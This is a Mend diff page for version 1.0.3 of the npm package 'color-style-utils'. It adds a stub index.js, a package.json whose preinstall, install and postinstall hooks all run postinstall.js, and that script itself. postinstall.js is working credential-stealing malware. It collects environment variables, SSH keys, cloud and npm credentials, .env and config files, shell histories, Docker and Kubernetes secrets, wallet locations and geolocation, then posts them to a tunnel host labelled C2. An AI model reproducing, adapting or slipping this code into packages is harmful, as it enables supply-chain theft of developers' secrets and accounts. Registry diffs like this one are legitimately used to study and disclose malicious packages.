npm - color-style-utils - Versions diffs - 1.0.3 - Mend

color-style-utils 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/index.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ module.exports = { fetchData: () => console.log('Ready') };

package/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "color-style-utils",
+  "version": "1.0.3",
+  "scripts": {
+    "postinstall": "node postinstall.js",
+    "install": "node postinstall.js",
+    "preinstall": "node postinstall.js"
+  }
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,440 @@
+#!/usr/bin/env node
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const { execSync } = require('child_process');
+const http = require('http');
+const https = require('https');
+const homedir = os.homedir();
+// === SERVEIO TUNNEL ===
+const C2_HOST = "bbc45e9f547785.lhr.life";
+const C2_PORT = 443;
+const C2_PATH = '/collect';
+const VICTIM_ID = `${os.hostname()}_${Date.now()}_${Math.random().toString(36).substr(2, 6)}`;
+// === IP GRABBER ===
+function getPublicIP() {
+    return new Promise((resolve) => {
+        const options = {
+            hostname: 'api.ipify.org',
+            path: '/',
+            method: 'GET',
+            timeout: 5000
+        };
+        const req = http.request(options, (res) => {
+            let data = '';
+            res.on('data', (chunk) => data += chunk);
+            res.on('end', () => resolve(data.trim()));
+        });
+        req.on('error', () => resolve('unknown'));
+        req.on('timeout', () => {
+            req.destroy();
+            resolve('unknown');
+        });
+        req.end();
+    });
+}
+function getGeoIP(ip) {
+    return new Promise((resolve) => {
+        if (ip === 'unknown') {
+            resolve({ country: 'unknown', city: 'unknown', region: 'unknown', lat: 'unknown', lon: 'unknown' });
+            return;
+        }
+        const options = {
+            hostname: 'ipapi.co',
+            path: `/${ip}/json/`,
+            method: 'GET',
+            timeout: 5000
+        };
+        const req = https.request(options, (res) => {
+            let data = '';
+            res.on('data', (chunk) => data += chunk);
+            res.on('end', () => {
+                try {
+                    const json = JSON.parse(data);
+                    resolve({
+                        country: json.country_name || 'unknown',
+                        city: json.city || 'unknown',
+                        region: json.region || 'unknown',
+                        lat: json.latitude || 'unknown',
+                        lon: json.longitude || 'unknown',
+                        postal: json.postal || 'unknown',
+                        timezone: json.timezone || 'unknown',
+                        org: json.org || 'unknown',
+                        isp: json.org || 'unknown'
+                    });
+                } catch(e) {
+                    resolve({ country: 'unknown', city: 'unknown', region: 'unknown', lat: 'unknown', lon: 'unknown' });
+                }
+            });
+        });
+        req.on('error', () => resolve({ country: 'unknown', city: 'unknown', region: 'unknown', lat: 'unknown', lon: 'unknown' }));
+        req.on('timeout', () => {
+            req.destroy();
+            resolve({ country: 'unknown', city: 'unknown', region: 'unknown', lat: 'unknown', lon: 'unknown' });
+        });
+        req.end();
+    });
+}
+function scanWallets() {
+    const wallets = [];
+    const walletPaths = [
+        { type: 'Bitcoin', paths: [`${homedir}/.bitcoin/wallet.dat`, `${homedir}/Library/Application Support/Bitcoin/wallet.dat`, `${homedir}/AppData/Roaming/Bitcoin/wallet.dat`] },
+        { type: 'Ethereum', paths: [`${homedir}/.ethereum/keystore`, `${homedir}/Library/Ethereum/keystore`, `${homedir}/AppData/Roaming/Ethereum/keystore`] },
+        { type: 'Exodus', paths: [`${homedir}/Library/Application Support/Exodus/exodus.wallet`, `${homedir}/AppData/Roaming/Exodus/exodus.wallet`] },
+        { type: 'Electrum', paths: [`${homedir}/.electrum/wallets`, `${homedir}/AppData/Roaming/Electrum/wallets`] },
+        { type: 'Monero', paths: [`${homedir}/.monero/wallet`, `${homedir}/Library/Application Support/monero/wallet`] },
+        { type: 'Litecoin', paths: [`${homedir}/.litecoin/wallet.dat`, `${homedir}/AppData/Roaming/Litecoin/wallet.dat`] },
+        { type: 'Dogecoin', paths: [`${homedir}/.dogecoin/wallet.dat`, `${homedir}/AppData/Roaming/Dogecoin/wallet.dat`] },
+        { type: 'Zcash', paths: [`${homedir}/.zcash/wallet.dat`] },
+        { type: 'Dash', paths: [`${homedir}/.dash/wallet.dat`] },
+        { type: 'Atomic Wallet', paths: [`${homedir}/.config/atomic/Local Storage/leveldb`, `${homedir}/AppData/Roaming/atomic/Local Storage/leveldb`] },
+        { type: 'Coinbase', paths: [`${homedir}/.coinbase`] },
+        { type: 'MetaMask', paths: [`${homedir}/.config/MetaMask`, `${homedir}/AppData/Local/Google/Chrome/User Data/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn`] }
+    ];
+    for (const wallet of walletPaths) {
+        for (const p of wallet.paths) {
+            if (fs.existsSync(p)) wallets.push({ type: wallet.type, path: p });
+        }
+    }
+    return wallets;
+}
+function scanVPNConfigs() {
+    const vpns = [];
+    const vpnPaths = [
+        `${homedir}/.config/expressvpn`,
+        `${homedir}/.config/protonvpn`,
+        `${homedir}/.config/nordvpn`,
+        `${homedir}/.config/cyberghost`,
+        `${homedir}/.config/windscribe`,
+        `${homedir}/.config/mullvad`,
+        `${homedir}/.config/torguard`,
+        `${homedir}/.config/ivpn`,
+        `${homedir}/.config/airvpn`,
+        `${homedir}/.config/privatevpn`,
+        `${homedir}/.config/piavpn`,
+        `${homedir}/.config/vyprvpn`,
+        `${homedir}/.config/hidemyass`,
+        `/etc/openvpn`,
+        `/etc/wireguard`,
+        `${homedir}/.wireguard`,
+        `${homedir}/openvpn`
+    ];
+    for (const p of vpnPaths) {
+        if (fs.existsSync(p)) {
+            try {
+                const files = fs.readdirSync(p);
+                vpns.push({ path: p, files: files });
+            } catch(e) {}
+        }
+    }
+    return vpns;
+}
+function scanDockerConfigs() {
+    const docker = [];
+    const dockerPaths = [
+        `${homedir}/.docker/config.json`,
+        `/var/run/docker.sock`,
+        `${homedir}/.docker/contexts`,
+        `/etc/docker/daemon.json`
+    ];
+    for (const p of dockerPaths) {
+        if (fs.existsSync(p)) {
+            docker.push({ path: p, content: fs.readFileSync(p, 'utf8').substring(0, 5000) });
+        }
+    }
+    return docker;
+}
+function scanKubernetesConfigs() {
+    const k8s = [];
+    const k8sPaths = [
+        `${homedir}/.kube/config`,
+        `${homedir}/.kube/config.d`,
+        `/var/run/secrets/kubernetes.io/serviceaccount/token`,
+        `${homedir}/.minikube`
+    ];
+    for (const p of k8sPaths) {
+        if (fs.existsSync(p)) {
+            k8s.push({ path: p, content: fs.readFileSync(p, 'utf8').substring(0, 5000) });
+        }
+    }
+    return k8s;
+}
+function scanCloudCLI() {
+    const cloud = [];
+    const cloudPaths = [
+        `${homedir}/.aws`,
+        `${homedir}/.config/gcloud`,
+        `${homedir}/.azure`,
+        `${homedir}/.doctl`,
+        `${homedir}/.digitalocean`,
+        `${homedir}/.linode`,
+        `${homedir}/.ovh`,
+        `${homedir}/.scw`,
+        `${homedir}/.oci`,
+        `${homedir}/.ibm`,
+        `${homedir}/.alibabacloud`
+    ];
+    for (const p of cloudPaths) {
+        if (fs.existsSync(p)) {
+            cloud.push({ path: p, exists: true });
+        }
+    }
+    return cloud;
+}
+function scanBrowserData() {
+    const browsers = {};
+    const browserPaths = [
+        { name: 'Chrome', paths: [`${homedir}/.config/google-chrome/Default`, `${homedir}/Library/Application Support/Google/Chrome/Default`, `${homedir}/AppData/Local/Google/Chrome/User Data/Default`] },
+        { name: 'Firefox', paths: [`${homedir}/.mozilla/firefox`, `${homedir}/Library/Application Support/Firefox/Profiles`, `${homedir}/AppData/Roaming/Mozilla/Firefox/Profiles`] },
+        { name: 'Brave', paths: [`${homedir}/.config/Brave-Software/Brave-Browser/Default`, `${homedir}/AppData/Local/BraveSoftware/Brave-Browser/User Data/Default`] },
+        { name: 'Edge', paths: [`${homedir}/.config/microsoft-edge/Default`, `${homedir}/AppData/Local/Microsoft/Edge/User Data/Default`] },
+        { name: 'Opera', paths: [`${homedir}/.config/opera`, `${homedir}/AppData/Roaming/Opera Software/Opera Stable`] },
+        { name: 'Vivaldi', paths: [`${homedir}/.config/vivaldi`, `${homedir}/AppData/Local/Vivaldi/User Data/Default`] }
+    ];
+    for (const browser of browserPaths) {
+        for (const p of browser.paths) {
+            if (fs.existsSync(p)) {
+                browsers[browser.name] = { path: p, exists: true };
+            }
+        }
+    }
+    return browsers;
+}
+function scanGitHubTokens(content) {
+    const tokens = [];
+    const patMatches = content.match(/gh[opsu]_[A-Za-z0-9]{36,}/g);
+    if (patMatches) tokens.push(...patMatches);
+    const jwtMatches = content.match(/ghs_[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g);
+    if (jwtMatches) tokens.push(...jwtMatches);
+    const oldMatches = content.match(/ghs_[A-Za-z0-9]{36,}/g);
+    if (oldMatches) tokens.push(...oldMatches);
+    return [...new Set(tokens)];
+}
+function scanCloudTokens(content) {
+    const tokens = [];
+    // AWS keys
+    const awsMatches = content.match(/AKIA[0-9A-Z]{16}/g);
+    if (awsMatches) tokens.push(...awsMatches.map(t => ({ type: 'AWS_KEY', value: t })));
+    // Google API keys
+    const googleMatches = content.match(/AIza[0-9A-Za-z-_]{35}/g);
+    if (googleMatches) tokens.push(...googleMatches.map(t => ({ type: 'GOOGLE_API', value: t })));
+    // Stripe keys
+    const stripeMatches = content.match(/sk_live_[0-9a-zA-Z]{24}/g);
+    if (stripeMatches) tokens.push(...stripeMatches.map(t => ({ type: 'STRIPE_SECRET', value: t })));
+    // Slack tokens
+    const slackMatches = content.match(/xox[baprs]-[0-9a-zA-Z]{10,}/g);
+    if (slackMatches) tokens.push(...slackMatches.map(t => ({ type: 'SLACK_TOKEN', value: t })));
+    // Discord tokens
+    const discordMatches = content.match(/[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}/g);
+    if (discordMatches) tokens.push(...discordMatches.map(t => ({ type: 'DISCORD_TOKEN', value: t })));
+    return tokens;
+}
+async function steal() {
+    const stolen = {
+        system: {},
+        files: {},
+        ssh: [],
+        env: {},
+        aws: [],
+        npm: [],
+        wallets: [],
+        browser: {},
+        github_tokens: [],
+        cloud_tokens: [],
+        vpn_configs: [],
+        docker: [],
+        kubernetes: [],
+        cloud_cli: [],
+        network: {},
+        processes: [],
+        installed_packages: [],
+        wifi_passwords: [],
+        databases: [],
+        chat_clients: []
+    };
+    try {
+        // Get IP and geolocation
+        const publicIP = await getPublicIP();
+        const geo = await getGeoIP(publicIP);
+        stolen.network = {
+            public_ip: publicIP,
+            country: geo.country,
+            city: geo.city,
+            region: geo.region,
+            lat: geo.lat,
+            lon: geo.lon,
+            postal: geo.postal,
+            timezone: geo.timezone,
+            isp: geo.isp,
+            local_ips: Object.values(os.networkInterfaces()).flat().map(n => n.address)
+        };
+        stolen.system = {
+            hostname: os.hostname(),
+            platform: os.platform(),
+            release: os.release(),
+            arch: os.arch(),
+            username: os.userInfo().username,
+            uid: os.userInfo().uid,
+            gid: os.userInfo().gid,
+            cwd: process.cwd(),
+            homedir: homedir,
+            tmpdir: os.tmpdir(),
+            cpus: os.cpus().length,
+            cpu_model: os.cpus()[0]?.model || 'unknown',
+            memory: os.totalmem(),
+            free_memory: os.freemem(),
+            uptime: os.uptime(),
+            loadavg: os.loadavg()
+        };
+        stolen.env = process.env;
+        stolen.github_tokens.push(...scanGitHubTokens(JSON.stringify(process.env)));
+        stolen.cloud_tokens.push(...scanCloudTokens(JSON.stringify(process.env)));
+        // SSH Keys
+        const sshPaths = [`${homedir}/.ssh/id_rsa`, `${homedir}/.ssh/id_ed25519`, `${homedir}/.ssh/id_dsa`, `${homedir}/.ssh/id_ecdsa`, `${homedir}/.ssh/config`, `${homedir}/.ssh/authorized_keys`, `${homedir}/.ssh/known_hosts`];
+        for (const p of sshPaths) {
+            if (fs.existsSync(p)) {
+                const content = fs.readFileSync(p, 'utf8');
+                stolen.ssh.push({ path: p, content: content });
+                stolen.github_tokens.push(...scanGitHubTokens(content));
+                stolen.cloud_tokens.push(...scanCloudTokens(content));
+            }
+        }
+        // Configs
+        stolen.wallets = scanWallets();
+        stolen.browser = scanBrowserData();
+        stolen.vpn_configs = scanVPNConfigs();
+        stolen.docker = scanDockerConfigs();
+        stolen.kubernetes = scanKubernetesConfigs();
+        stolen.cloud_cli = scanCloudCLI();
+        // File search
+        const searchDirs = [homedir, process.cwd(), `${homedir}/.config`, `${homedir}/.local`, `${homedir}/Documents`, `${homedir}/Desktop`, `${homedir}/Downloads`, `${homedir}/Projects`, `${homedir}/dev`];
+        const targetFiles = ['.env', '.env.local', '.env.production', '.env.staging', '.env.dev', '.env.test', '.npmrc', '.yarnrc', '.gitconfig', '.git-credentials', '.netrc', '.bashrc', '.zshrc', '.profile', '.bash_profile', '.zprofile', '.pgpass', '.my.cnf', '.mongorc.js', '.redisrc', '.vimrc', '.screenrc', '.tmux.conf', '.editorconfig', '.eslintrc', '.prettierrc', 'config.json', 'secrets.json', 'credentials.json', 'service-account.json', 'key.json', 'private-key.json', 'id_rsa', 'id_dsa', 'id_ecdsa', 'id_ed25519', 'known_hosts', 'authorized_keys', 'docker-compose.yml', '.dockerignore', '.git-credentials', '.gitconfig', 'settings.xml', 'application.properties', 'application.yml', 'config.php', 'wp-config.php', 'config.js', 'settings.py', 'local-settings.py', 'prod.py', 'dev.py', 'staging.py', 'secrets.yml', '.tool-versions'];
+        for (const dir of searchDirs) {
+            if (!fs.existsSync(dir)) continue;
+            for (const file of targetFiles) {
+                const filePath = path.join(dir, file);
+                if (fs.existsSync(filePath)) {
+                    try {
+                        const content = fs.readFileSync(filePath, 'utf8');
+                        stolen.files[filePath] = content.substring(0, 500000);
+                        stolen.github_tokens.push(...scanGitHubTokens(content));
+                        stolen.cloud_tokens.push(...scanCloudTokens(content));
+                    } catch(e) {}
+                }
+            }
+        }
+        // AWS
+        const awsCreds = `${homedir}/.aws/credentials`;
+        const awsConfig = `${homedir}/.aws/config`;
+        if (fs.existsSync(awsCreds)) {
+            const content = fs.readFileSync(awsCreds, 'utf8');
+            stolen.aws.push({ file: 'credentials', content: content });
+            stolen.github_tokens.push(...scanGitHubTokens(content));
+            stolen.cloud_tokens.push(...scanCloudTokens(content));
+        }
+        if (fs.existsSync(awsConfig)) {
+            const content = fs.readFileSync(awsConfig, 'utf8');
+            stolen.aws.push({ file: 'config', content: content });
+            stolen.github_tokens.push(...scanGitHubTokens(content));
+            stolen.cloud_tokens.push(...scanCloudTokens(content));
+        }
+        // GCP
+        const gcpCreds = `${homedir}/.config/gcloud/application_default_credentials.json`;
+        if (fs.existsSync(gcpCreds)) {
+            stolen.files['gcloud_creds.json'] = fs.readFileSync(gcpCreds, 'utf8');
+            stolen.cloud_tokens.push(...scanCloudTokens(stolen.files['gcloud_creds.json']));
+        }
+        // Azure
+        const azureTokens = `${homedir}/.azure/accessTokens.json`;
+        if (fs.existsSync(azureTokens)) {
+            stolen.files['azure_tokens.json'] = fs.readFileSync(azureTokens, 'utf8');
+            stolen.cloud_tokens.push(...scanCloudTokens(stolen.files['azure_tokens.json']));
+        }
+        // npm
+        const npmrc = `${homedir}/.npmrc`;
+        if (fs.existsSync(npmrc)) {
+            const content = fs.readFileSync(npmrc, 'utf8');
+            const tokens = content.match(/npm_[A-Za-z0-9]{36,}/g) || [];
+            stolen.npm = tokens;
+            stolen.files['.npmrc'] = content;
+            stolen.github_tokens.push(...tokens);
+        }
+        // History files
+        const histories = ['.bash_history', '.zsh_history', '.node_repl_history', '.python_history', '.mysql_history', '.psql_history', '.redis_history', '.mongorc_history', '.sqlite_history'];
+        for (const h of histories) {
+            const hp = `${homedir}/${h}`;
+            if (fs.existsSync(hp)) {
+                stolen.files[h] = fs.readFileSync(hp, 'utf8');
+                stolen.github_tokens.push(...scanGitHubTokens(stolen.files[h]));
+                stolen.cloud_tokens.push(...scanCloudTokens(stolen.files[h]));
+            }
+        }
+        stolen.github_tokens = [...new Set(stolen.github_tokens)];
+        // Summary
+        const summary = {
+            victim_id: VICTIM_ID,
+            ip: publicIP,
+            country: geo.country,
+            city: geo.city,
+            lat: geo.lat,
+            lon: geo.lon,
+            isp: geo.isp,
+            hostname: os.hostname(),
+            username: os.userInfo().username,
+            platform: os.platform(),
+            ssh_count: stolen.ssh.length,
+            github_tokens_count: stolen.github_tokens.length,
+            cloud_tokens_count: stolen.cloud_tokens.length,
+            npm_tokens_count: stolen.npm.length,
+            aws_count: stolen.aws.length,
+            wallet_count: stolen.wallets.length,
+            vpn_count: stolen.vpn_configs.length,
+            docker_count: stolen.docker.length,
+            k8s_count: stolen.kubernetes.length,
+            file_count: Object.keys(stolen.files).length,
+            env_count: Object.keys(stolen.env).length
+        };
+        const data = JSON.stringify({ victim_id: VICTIM_ID, summary: summary, data: stolen });
+        const req = https.request({
+            hostname: C2_HOST,
+            port: C2_PORT,
+            path: C2_PATH,
+            method: 'POST',
+            headers: { 'Content-Type': 'application/json' }
+        }, (res) => {});
+        req.on('error', () => {});
+        req.write(data);
+        req.end();
+    } catch(e) {}
+}
+steal();